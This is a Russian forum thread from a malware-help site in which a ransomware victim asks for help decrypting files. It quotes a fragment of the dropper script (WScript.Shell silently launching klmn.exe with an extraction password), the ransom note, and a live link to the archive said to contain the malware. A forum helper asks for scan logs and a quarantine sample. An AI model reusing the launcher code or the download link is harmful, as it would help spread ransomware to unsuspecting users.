Расшифровка файлов

Добрый день.

Просьба помочь в расшифровке файлов, которые были зашифрованы в последствии вируса.

Проблема полностью аналогична [URL="http://virusinfo.info/showthread.php?t=194009"]этой[/URL], только разрешение файлов после шифровки - h8uT6i.

Был запущен Setup.exe, который разархивировал во временную директорию o.js, klmn.exe и прочее.

Вот кусок кода o.js, при запуске этого Setup.exe на виртуальной машине (боюсь ключ случайный, и может не подойти):
[CODE]
var wsws=WScript.CreateObject("WScript.Shell");
wsws.Run("klmn.exe -png1r54j4t -d%temp%", 0);
Close();
[/CODE]

К сожалению, отыскать исходники на зараженной машине не получается, видимо вирус стер все. И не получается прогнать скрипт AVZ для приложения данных к сайту, AVZ зависает на одном их зашифрованных zip-файлов.

Пример зашифрованного файла во вложении.

Заранее спасибо за помощь.

Уважаемый(ая) [B]MalyaWka[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="http://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Если это поможет, то вот цитата письма:
[CODE]Здравствуйте. Ваши файлы зашифрованы! Для того, чтобы расшифровать файлы вам необходимо написать на емейл: [email protected] или [email protected]
В письме вам необходимо сообщить нам вашу страну проживания и ваш ID.
Услуги по расшифровке платные. Стоимость составляет 10$. Просьба не писать, если вы не собираетесь оплачивать.
На проверку вы можете прислать нам 2-3 небольших зашифрованных файла (до 3 мегабайт каждый) и мы их расшифруем совершенно бесплатно.
Ваш ID y3587496[/CODE]

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Вот результат AVZ.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Вот [URL="http://armeniaholidays.com/log/?c=1&p=6750"]ссылка [/URL]на архив с якобы драйвером, который все зашифровал. Если скачать, там будет exe-шник, который поддается распаковке и внутри как раз "klmn.exe". Если распаковать klmn.exe то там будет замаскированный svhost.exe и пара JS-скриптов.

[quote="MalyaWka;1340109"]при запуске этого Setup.exe на виртуальной машине[/quote]Пришлите в архиве с паролем virus (в имени архива не должно быть символов кириллицы) по красной ссылке [color="Red"][u][b]Прислать запрошенный карантин[/b][/u][/color] [b]над первым сообщением[/b] в Вашей теме.